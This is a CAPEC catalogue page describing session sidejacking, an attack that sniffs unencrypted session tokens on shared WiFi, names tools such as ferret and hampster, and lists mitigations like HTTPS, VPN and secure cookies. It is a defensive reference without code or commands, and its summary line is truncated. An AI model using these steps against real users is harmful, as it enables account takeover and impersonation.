CAPEC - Common Attack Pattern Enumeration and Classification (A Community of Knowledge Resource for Building Secure Software)
Home > CAPEC List > CAPEC-102: Session Sidejacking (Release 1.4)  

CAPEC-102: Session Sidejacking

 
Session Sidejacking
Attack Pattern ID: 102 (Standard Attack Pattern Completeness: Complete)Typical Severity: HighStatus: Draft
+ Description

Summary

ss network.

Attack Execution Flow

Explore

  1. Detect Unprotected Session Token Transfer:

    The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    The attacker uses a network sniffer tool like ferret or hampster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies his knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

    env-Web

    Indicators

    IDtypeIndicator DescriptionEnvironments
    1Positive

    The attacker and the victim are both on the same WiFi network.

    env-Web env-ClientServer
    2Positive

    Traffic between the victim and targeted application is unencrypted.

    env-Web env-ClientServer

    Outcomes

    IDtypeOutcome Description
    1Success
    The attacker sees session tokens in the unencrypted traffic
Experiment

  1. Capture session token:

    The attacker uses sniffing tools to capture a session token from traffic.

  2. Insert captured session token:

    The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation:

    The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

    Security Controls

    IDtypeSecurity Control Description
    1Preventative
    Utilize end to end encrypted communication via a secure tunneling protocol between the victim and the target system.
+ Attack Prerequisites

    An attacker and the victim are both using the same WiFi network.

    The victim has an active session with a target system.

    The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)

    The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically "rings home" asynchronously using the session token

+ Typical Likelihood of Exploit

Likelihood: High

+ Methods of Attack
  • Time and State
  • Analysis
  • Spoofing
  • Protocol Manipulation
+ Examples-Instances

Description

The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, he has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but his e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account.

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

Easy to use tools exist to automate this attack.

+ Resources Required

Low: A laptop and access to a public WiFi network.

+ Probing Techniques

Use available tools to snoop on communications between the victim and the target system and try to capture the transmitted session token

Use the captured session token to impersonate the victim on the target system to perform actions and view information on their behalf.

+ Solutions and Mitigations

Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is importnat to ensure that all communication between the client and the server happens via an encrypted secure channel.

Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.

+ Attack Motivation-Consequences
  • Privilege Escalation
  • Data Modification
  • Information Leakage
  • Denial of Service
+ Relevant Security Requirements

Ensure that SSL is used for all communication between the client and the target system where sensitive data and/or operations are available.

Ensure that session cookies are only transmitted via SSL pipes by setting the cookie's secure attribute to true.

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: HighIntegrity Impact: HighAvailability Impact: Low
+ Technical Context
Architectural Paradigms
Client-Server
Frameworks
All
Platforms
All
Languages
All
+ Content History
Submissions
SubmitterOrganizationDateComments
Evgeny LebanidzeCigital, Inc2009-01-12Initial core pattern content
Modifications
ModifierOrganizationDateComments
Sean BarnumCigital Federal, Inc.2009-04-20Refinement of pattern content
Back to top
Page Last Updated: September 23, 2009
 

CAPEC is sponsored by the National Cyber Security Division of the U.S. Department of Homeland Security.

Vision and Technical Leadership provided by Cigital, Inc.

This Web site is hosted by The MITRE Corporation.
Copyright 2009, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation.

Contact capec@mitre.org for more information.
Privacy policy
Terms of use
Contact us